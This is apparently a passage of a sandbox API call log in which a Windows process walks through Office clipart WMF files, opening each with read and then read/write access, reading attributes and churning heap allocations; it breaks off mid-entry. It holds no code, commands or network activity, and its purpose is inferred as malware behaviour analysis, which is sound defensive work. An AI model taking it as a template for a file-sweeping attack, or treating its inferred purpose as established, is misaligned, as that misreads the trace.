[0101.396] GetFileType (hFile=0x33c) returned 0x1 [0101.396] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0101.396] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.396] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.396] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.397] CloseHandle (hObject=0x33c) returned 1 [0101.397] AreFileApisANSI () returned 1 [0101.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0101.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 69 [0101.397] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04108_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.397] GetFileType (hFile=0x33c) returned 0x1 [0101.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0101.397] CloseHandle (hObject=0x33c) returned 1 [0101.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.397] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.397] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0101.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0101.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0101.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0101.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0101.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0101.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.398] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.398] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.399] AreFileApisANSI () returned 1 [0101.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0101.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 69 [0101.399] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04108_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc63b1c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x928)) returned 1 [0101.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0101.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0101.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0101.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0101.399] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.399] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.399] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17ac, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN04117_.WMF", cAlternateFileName="")) returned 1 [0101.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0101.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0101.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0101.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0101.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0101.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0101.399] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0101.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0101.399] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0101.400] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0101.400] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0101.400] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0101.400] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.400] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.400] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.400] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.400] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0101.400] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.400] AreFileApisANSI () returned 1 [0101.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0101.400] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.400] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0101.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0101.400] AreFileApisANSI () returned 1 [0101.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0101.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 69 [0101.400] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04117_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.401] GetFileType (hFile=0x33c) returned 0x1 [0101.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0101.401] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.401] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.401] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.401] CloseHandle (hObject=0x33c) returned 1 [0101.402] AreFileApisANSI () returned 1 [0101.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a8c0 [0101.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 69 [0101.402] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04117_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.402] GetFileType (hFile=0x33c) returned 0x1 [0101.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0101.402] CloseHandle (hObject=0x33c) returned 1 [0101.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0101.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0101.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0101.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0101.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0101.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0101.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.403] AreFileApisANSI () returned 1 [0101.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0101.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 69 [0101.403] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04117_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17ac)) returned 1 [0101.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0101.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0101.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0101.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0101.404] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.404] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.404] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc63b1c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd58, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN04134_.WMF", cAlternateFileName="")) returned 1 [0101.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0101.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0101.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0101.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0101.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0101.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0101.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0101.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0101.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0101.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0101.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0101.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a8c0 [0101.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0101.404] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.404] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.404] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: 